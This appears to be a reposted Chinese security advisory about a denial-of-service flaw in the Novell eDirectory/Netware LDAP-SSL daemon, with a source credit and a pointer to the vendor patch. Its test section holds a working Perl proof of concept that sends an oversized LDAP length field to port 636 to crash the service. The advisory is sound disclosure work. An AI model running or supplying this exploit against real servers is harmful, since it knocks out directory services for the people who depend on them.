Novell eDirectory/Netware LDAP-SSL后台程序漏洞

文章由LinuxBoy分享于2019-04-02 10:04:50热评（622）

Novell eDirectory/Netware LDAP-SSL后台程序漏洞

发布日期：2011-05-16
更新日期：2011-05-16

受影响系统：
Novell Netware
Novell eDirectory
描述：
--------------------------------------------------------------------------------
Novell eDirectory是一个的跨平台的目录服务器。

Novell eDirectory/Netware LDAP-SSL后台程序在实现上存在拒绝服务漏洞，由于系统不恰当地分配用户指定的内存量，攻击者可利用此漏洞造成系统范围内的拒绝服务。

<*来源：Henri Lindberg （henri.lindberg@louhi.fi）

链接：http://marc.info/?l=bugtraq&m=130556395605091&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
       # usage: ./novell.pl 10.0.0.1 0x41424344
       use IO::Socket::SSL;
       $socket = new IO::Socket::SSL(Proto=>"tcp",
       PeerAddr=>$ARGV[0], PeerPort=>636);
       die "unable to connect to $host:$port ($!)\n" unless $socket;
       print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
       "\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
       close $socket; print "done\n";

建议：
--------------------------------------------------------------------------------
厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://support.novell.com/security-alerts

推荐文章：

Novell eDirectory/Netware LDAP-SSL后台程序漏洞